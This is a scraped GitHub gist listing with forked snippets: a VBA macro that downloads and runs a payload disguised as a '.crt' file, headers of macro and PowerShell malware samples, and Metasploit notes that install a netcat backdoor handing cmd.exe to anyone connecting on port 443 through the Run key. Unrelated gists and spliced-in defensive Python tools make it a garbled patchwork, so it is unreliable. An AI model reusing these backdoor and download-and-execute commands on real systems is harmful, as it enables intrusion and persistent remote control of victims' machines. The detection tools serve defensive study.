@robpotter89
robpotter89 / classicTwist.txt
Created July 16, 2021 21:25 — forked from JPMonglis/classicTwist.txt
The classic download and execute macro, with a twist
Sub DownloadAndExec()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://trusted.domain/encoded.crt", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
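A defender-side counterpart to the macro above, added here as an example and not part of the gist: a small static triage pass that follows the CreateObject() assignments (xHttp -> Microsoft.XMLHTTP, bStrm -> ADODB.Stream) so that `.Open "GET"`, the `With bStrm` block's `.Type = 1` and `.SaveToFile` are attributed to the objects behind the variable names instead of being grep'd as bare strings, and that flags a payload URL whose extension (.crt here) does not match what is being fetched. The sample macro embeds the gist's opening lines plus an assumed Write/SaveToFile/Shell tail, the ProgID and extension lists are my own choices, and string-built URLs (Chr()/StrReverse obfuscation) are deliberately out of scope.

```python
"""Static triage of a VBA macro for the download-and-execute chain (added example).

Tracks which COM object each CreateObject() result is stored in, so that
`xHttp.Open "GET", ...` and a `With bStrm ... .SaveToFile` block are
attributed to Microsoft.XMLHTTP and ADODB.Stream rather than matched as
bare strings, then reports which stages of the chain are present.
"""
from __future__ import annotations

import os
import re
from urllib.parse import urlparse

# Constructed sample: the gist's opening lines plus an assumed tail
# (Write/SaveToFile/Shell) that completes the classic chain.
MACRO = '''Sub DownloadAndExec()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://trusted.domain/encoded.crt", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
.Write xHttp.responseBody
.SaveToFile Environ("TEMP") & "\\payload.exe", 2
End With
Shell Environ("TEMP") & "\\payload.exe", vbHide
End Sub
'''
BENIGN = '''Sub Greet()
MsgBox "Hello"
End Sub
'''

DOWNLOADERS = {"microsoft.xmlhttp", "msxml2.xmlhttp", "msxml2.serverxmlhttp",
               "winhttp.winhttprequest.5.1"}
STREAMS = {"adodb.stream"}
# Extensions a binary payload is commonly hidden behind (assumed list).
DISGUISE_EXT = {".crt", ".cer", ".pem", ".txt", ".jpg", ".png", ".gif", ".dat"}

CREATE_RE = re.compile(r'Set\s+(\w+)\s*=\s*CreateObject\("([^"]+)"\)', re.I)
OPEN_RE = re.compile(r'^\s*(\w+)\.Open\s+"(GET|POST)"\s*,\s*"([^"]+)"', re.I)
WITH_RE = re.compile(r'^\s*With\s+(\w+)\s*$', re.I)
END_WITH_RE = re.compile(r'^\s*End\s+With\b', re.I)
MEMBER_RE = re.compile(r'^\s*(\w*)\.(\w+)(.*)$')
EXEC_RE = re.compile(r'\bShell\b|\bShellExecute\b|WScript\.Shell|\.Exec\b|\.Run\b', re.I)


def triage(vba: str) -> dict:
    """Return the chain stages found: objects, url, disguised_ext, binary_stream, save_path, executes."""
    objects: dict[str, str] = {}          # variable (lower) -> ProgID (lower)
    with_stack: list[str] = []            # targets of enclosing With blocks
    r = {"objects": {}, "url": None, "disguised_ext": None,
         "binary_stream": False, "save_path": None, "executes": False}
    for raw in vba.splitlines():
        line = raw.split("'", 1)[0]       # drop VBA comment (naive: apostrophes inside strings)
        m = CREATE_RE.search(line)
        if m:
            objects[m.group(1).lower()] = m.group(2).lower()
            r["objects"][m.group(1)] = m.group(2).lower()
            continue
        m = WITH_RE.match(line)
        if m:
            with_stack.append(m.group(1).lower())
            continue
        if END_WITH_RE.match(line):
            if with_stack:
                with_stack.pop()
            continue
        m = OPEN_RE.match(line)
        if m and objects.get(m.group(1).lower()) in DOWNLOADERS:
            r["url"] = m.group(3)
            ext = os.path.splitext(urlparse(r["url"]).path)[1].lower()
            if ext in DISGUISE_EXT:
                r["disguised_ext"] = ext
            continue
        m = MEMBER_RE.match(line)
        if m:
            # A leading "." inside a With block refers to the With target.
            var = (m.group(1) or (with_stack[-1] if with_stack else "")).lower()
            member, rest = m.group(2).lower(), m.group(3)
            if objects.get(var) in STREAMS:
                if member == "type" and re.match(r"\s*=\s*1\b", rest):
                    r["binary_stream"] = True          # adTypeBinary
                elif member == "savetofile":
                    r["save_path"] = rest.strip()
        if EXEC_RE.search(line):
            r["executes"] = True
    r["download_and_execute"] = bool(r["url"] and r["save_path"] and r["executes"])
    return r


if __name__ == "__main__":
    for name, src in (("MACRO", MACRO), ("BENIGN", BENIGN)):
        print(name, triage(src))
```

The alias map is the part worth keeping when you extend this: the same chain written as `Set o = CreateObject("MSXML2.ServerXMLHTTP")` with the stream accessed only through `With` still resolves, whereas a flat indicator list keyed on `xHttp`/`bStrm` would miss it.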
@robpotter89
robpotter89 / macromal.txt
Created July 16, 2021 21:25 — forked from JPMonglis/macromal.txt
Macro malware that retrieves the OS (Windows or OSX) and executes the appropriate payload
'get OS, if nt else if OS X
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
' A Base64 Encoder/Decoder.
'
' This module is used to encode and decode data in Base64 format as described in RFC 1521.
'
' Home page: www.source-code.biz.
' License: GNU/LGPL (www.gnu.org/licenses/lgpl.html).
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland.
@robpotter89
robpotter89 / powermal.txt
Created July 16, 2021 21:25 — forked from JPMonglis/powermal.txt
PowerShell malware [posted by @JohnLaTwC]
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
## msf netcat backdoor in persistence
- netcat is included in metasploit
- upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 ## writing to system32 needs admin/SYSTEM rights
- ## registry key adding (Run key: executes at every logon)
- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' ## -L re-listen after each client disconnects, -d detach from console, -p listen port, -e program handed to the client
- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc
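Hunting for exactly this persistence from the defender's side, added here as an example and not part of the notes above: the script parses the text of a `reg export` of the HKLM Run key (a constructed sample is embedded, including the `nc.exe -Ldp 443 -e cmd.exe` value) and flags values that start a netcat-style listener, extracting the port so it can be checked against host firewall rules. The indicator names, the renamed-binary case and the `.reg` sample are my own assumptions; the `read_live_run_key` helper only works on a Windows host.

```python
"""Hunt netcat-style Run-key persistence in a registry export (added example).

Parses `reg export HKLM\\...\\Run out.reg` text for values whose command
line looks like `nc.exe -Ldp 443 -e cmd.exe`: a netcat binary, listen
flags, a port, and a shell handed to the connecting client.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample of a .reg export (assumption, not a real capture).
# .reg files escape backslashes as \\ inside REG_SZ data.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"nc"="C:\\windows\\system32\\nc.exe -Ldp 443 -e cmd.exe"
"Updater"="C:\\Users\\Public\\svchost.exe -l -p 4444 -e powershell.exe"
'''

NC_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "pwsh.exe"}
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


@dataclass
class Finding:
    value_name: str
    command: str
    port: int | None
    reasons: list[str] = field(default_factory=list)


def parse_run_values(reg_text: str, key: str = RUN_KEY) -> dict[str, str]:
    """Return {value_name: command} for the REG_SZ values under one key."""
    values: dict[str, str] = {}
    in_key = False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key.lower()
            continue
        m = VALUE_RE.match(line) if in_key else None
        if m:
            name, data = m.group(1), m.group(2)
            values[name] = data.replace("\\\\", "\\").replace('\\"', '"')
    return values


def analyze_command(cmd: str) -> tuple[int | None, list[str]]:
    """Score one Run-key command line; returns (listen port, reasons)."""
    try:
        tokens = shlex.split(cmd, posix=False)  # keep Windows backslashes intact
    except ValueError:
        tokens = cmd.split()
    if not tokens:
        return None, []
    reasons: list[str] = []
    exe = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe in NC_NAMES:
        reasons.append(f"netcat binary ({exe})")
    port = None
    for i, tok in enumerate(tokens[1:], start=1):
        if not tok.startswith("-"):
            continue
        flags = tok.lstrip("-").lower()          # "-Ldp" -> "ldp"
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if "l" in flags:
            reasons.append(f"listen flag ({tok})")
        if "p" in flags and nxt.isdigit():       # -p 443 or -Ldp 443
            port = int(nxt)
        if flags in ("e", "c") and nxt.lower() in SHELLS:
            reasons.append(f"hands {nxt} to the client ({tok})")
    return port, reasons


def hunt_run_key(reg_text: str) -> list[Finding]:
    """Return the Run values that look like a netcat-style listener.

    A known netcat filename is enough on its own; a renamed binary is
    flagged only when it both listens and hands a shell to the client.
    """
    findings: list[Finding] = []
    for name, cmd in parse_run_values(reg_text).items():
        port, reasons = analyze_command(cmd)
        listens = any(r.startswith("listen") for r in reasons)
        shells = any(r.startswith("hands") for r in reasons)
        is_nc = any(r.startswith("netcat") for r in reasons)
        if is_nc or (listens and shells):
            findings.append(Finding(name, cmd, port, reasons))
    return findings


def read_live_run_key() -> dict[str, str]:
    """Read the real HKLM Run key; Windows only (winreg import fails elsewhere)."""
    import winreg  # assumption: executed on the Windows host being checked
    values: dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") as k:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(k, i)
            except OSError:
                break
            values[name] = str(data)
            i += 1
    return values


if __name__ == "__main__":
    for f in hunt_run_key(SAMPLE_REG):
        print(f"{f.value_name}: port={f.port} {f.command!r} <- {', '.join(f.reasons)}")
```

Run it over `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.reg` output from a suspect host, and remember the same check belongs on the HKCU Run/RunOnce keys, which a non-admin attacker can write to.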
alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias .....="cd ../../../.."
alias ~="cd ~" # `cd` is probably faster to type though
alias -- -="cd -"
alias cd..="cd .."
alias dl="cd ~/Downloads"
alias h="history"
alias pubip="dig +short myip.opendns.com @resolver1.opendns.com"
alias localip="sudo ifconfig | grep -Eo 'inet (addr:)?([0-9]*\\.){3}[0-9]*' | grep -Eo '([0-9]*\\.){3}[0-9]*' | grep -v '127.0.0.1'"
@robpotter89
robpotter89 / fud3
Last active July 15, 2021 16:32 — forked from robpot891/fud3
fud3
#!/bin/bash
clear
echo ' __________ _____________ ______ _________ '
echo ' ___ ____/_____ _________ /___ __ \_____ _____ ____ /___________ ______ / '
echo ' __ /_ _ __ `/_ ___/ __/_ /_/ / __ `/_ / / /_ /_ __ \ __ `/ __ / '
echo ' _ __/ / /_/ /_(__ )/ /_ _ ____// /_/ /_ /_/ /_ / / /_/ / /_/ // /_/ / '
echo ' /_/ \__,_/ /____/ \__/ /_/ \__,_/ _\__, / /_/ \____/\__,_/ \__,_/ '
echo ' /____/ '
echo ' _________ _____ '
echo ' __ ____/_____________________________ __ /______________ '
@robpotter89
robpotter89 / Celery.md
Created November 11, 2020 16:39 — forked from JeOam/Celery.md
Celery Tips

##### What is Celery?
Celery is an asynchronous task queue. You can use it to execute tasks outside of the context of your application. The general idea is that any resource-consuming task your application needs to run can be offloaded to the task queue, leaving your application free to respond to client requests.

Celery has three core components:

  • The Celery client. This is used to issue background jobs.
  • The Celery workers. These are the processes that run the background jobs. Celery supports local and remote workers, so you can start with a single worker running on the same machine as your application server, and later add more workers as the needs of your application grow.
  • The message broker. The client communicates with the workers through a message queue, and Celery supports several ways to implement these queues. The most commonly used brokers are RabbitMQ and Redis.
@robpotter89
robpotter89 / desktop_activity.py
Last active October 26, 2020 20:22
Various pyautogui scripts for mouse/keyboard automation
#!/usr/bin/env python
import sys
import pyautogui
from datetime import datetime, timedelta
def move_rel(dx, dy, dur):
pyautogui.moveRel(dx, dy, dur, pyautogui.easeInQuad)
def square(side, dur):
@robpotter89
robpotter89 / bas_sd_scraper.py
Created October 26, 2020 20:14 — forked from AO8/bas_sd_scraper.py
Python webscraper + email report creator. Uses BeautifulSoup and pyautogui to scrape Green River's online class finder for BAS software development and programming prereq enrollments, then sends email report to stakeholders.
# Python Standard Library
import smtplib
import ssl
import webbrowser
from datetime import datetime as dt
from email.mime.text import MIMEText
from time import sleep
from urllib.request import urlopen
# Third-party
@robpotter89
robpotter89 / nmap_profile.py
Created October 16, 2020 07:31 — forked from angeloped/nmap_profile.py
A collection of Nmap scan presets for python-nmap.
import re
import nmap
"""
name: nmap_profile.py
author: bryan angelo
description: A collection of Nmap scan profiles for python-nmap.
"""
nmap_profiles = {
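The preset idea from nmap_profile.py carried through, added here as an example rather than the gist's own code: a small profile table, a builder that turns a profile name plus a validated target into an argv list (never a shell string, so a "target" such as `-iL /etc/hosts` or `--script=...` cannot be smuggled in as an option), and a parser for nmap's `-oX -` XML that returns the open ports per host. The profile names and arguments, and the embedded XML result, are my own assumptions; python-nmap's PortScanner is replaced by a direct subprocess call so the parser can be exercised offline.

```python
"""Nmap scan presets with a safe argv builder and an -oX XML parser (added example).

Not the gist's own code: profile names and arguments are my own picks, and
nmap is run through subprocess with `-oX -` instead of python-nmap so the
result parser can be exercised offline on the constructed XML below.
"""
from __future__ import annotations

import ipaddress
import re
import shlex
import subprocess
import xml.etree.ElementTree as ET

NMAP_PROFILES = {            # assumed presets, edit to taste
    "quick":   "-sS -T4 -F",
    "intense": "-sS -T4 -A -v",
    "udp_top": "-sU --top-ports 50",
    "web":     "-sV -p 80,443,8080,8443 --script http-title",
}

# RFC 1123 hostname: labels of letters/digits/hyphens, no leading hyphen.
HOST_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)"
    r"(?:\.(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?))*$")

# Constructed nmap XML (assumption, not a real scan): one host up with
# 22/443 open and 80 filtered, one host down.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -T4 -F -oX - 10.0.0.4/30">
<host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
<port protocol="tcp" portid="80"><state state="filtered"/></port>
<port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
</ports></host>
<host><status state="down"/><address addr="10.0.0.6" addrtype="ipv4"/></host>
</nmaprun>
"""


def valid_target(target: str) -> bool:
    """Accept an IP address/network or a hostname; reject anything nmap
    could read as an option (e.g. '-iL /etc/hosts' or '--script=vuln')."""
    try:
        ipaddress.ip_network(target, strict=False)
        return True
    except ValueError:
        return bool(HOST_RE.match(target))


def build_command(profile: str, target: str) -> list[str]:
    """argv for one preset; the target is validated and never passed through a shell."""
    if profile not in NMAP_PROFILES:
        raise KeyError(f"unknown profile {profile!r}")
    if not valid_target(target):
        raise ValueError(f"refusing target {target!r}")
    return ["nmap", *shlex.split(NMAP_PROFILES[profile]), "-oX", "-", target]


def parse_nmap_xml(xml_text: str) -> dict[str, list[tuple[int, str, str]]]:
    """{address: [(port, protocol, service), ...]} for open ports on hosts that are up."""
    results: dict[str, list[tuple[int, str, str]]] = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:                       # fall back to whatever address is present
            addr = host.find("address")
        if addr is None:
            continue
        open_ports: list[tuple[int, str, str]] = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            open_ports.append((int(port.get("portid")), port.get("protocol"),
                               svc.get("name", "") if svc is not None else ""))
        results[addr.get("addr")] = sorted(open_ports)
    return results


def run_profile(profile: str, target: str, timeout: int = 900) -> dict:
    """Run a preset against a validated target and return the parsed result."""
    proc = subprocess.run(build_command(profile, target), capture_output=True,
                          text=True, check=True, timeout=timeout)
    return parse_nmap_xml(proc.stdout)


if __name__ == "__main__":
    print(build_command("quick", "10.0.0.5"))
    print(parse_nmap_xml(SAMPLE_XML))
```

If you keep python-nmap, the same validation belongs in front of `PortScanner.scan(hosts=..., arguments=...)`: it builds the command line from those strings, so a target or profile taken from user input is an argument-injection surface either way.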